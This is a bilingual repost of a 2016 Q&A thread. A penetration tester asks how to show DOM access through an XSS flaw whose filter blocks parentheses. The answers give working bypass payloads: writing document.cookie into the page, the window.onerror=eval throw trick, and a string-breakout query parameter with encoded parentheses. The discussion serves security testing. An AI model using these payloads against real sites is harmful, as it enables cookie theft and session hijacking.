括住JS中的替代方法(如果有)?
[英]parentheses alternatives in JS , if any?
问题描述
I have found that Cross Site Scripting vulnerability in a client's application. 
我发现客户端应用程序中存在跨站点脚本漏洞。 The problem is that the vulnerable parameter does not accept parentheses. 问题是易受攻击的参数不接受括号。 So something like alert(document.cookie) will be rejected because of parentheses. 因此,由于括号,诸如alert(document.cookie)类的东西将被拒绝。 I can get XSS using alert `xss` but I my client requires a proof of being able to access the DOM. 我可以使用alert `xss`来获取XSS,但是我的客户需要能够访问DOM的证明。
In other words, How can I alert(document.cookie) without parentheses , are there any alternatives? 换句话说,如何在没有括号的情况下alert(document.cookie) ,是否有其他选择?
Thanks! 谢谢!
2 个解决方案
解决方案1
6 已采纳 2016-11-30 21:38:12
document.body.innerHTML=document.cookie will display the cookies on the page itself. document.body.innerHTML=document.cookie将在页面本身上显示cookie。
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. 说到XSS漏洞:是的,它很脆弱,并且禁用括号会迫使攻击者使用更多的创新方法。 Letting someone execute any arbitrary code is a liability. 让别人执行任意代码是一个责任。
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input: 这是一个简单的示例,说明如何在不使用输入括号的情况下使用任何参数调用任何函数:
<p>Malicious input: window.onerror=eval;throw '=1;alert\(document.location\)'</p> <input type="button" onclick="window.onerror=eval;throw '=1;alert\(document.location\)'" value="Click me">
解决方案2
0 2016-11-30 22:33:55
This is another solution that worked for me: 这是另一个对我有用的解决方案:
<script>
var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';
</script>
The payload would be: 有效载荷为:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc answer is also working. @tcooc答案也有效。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.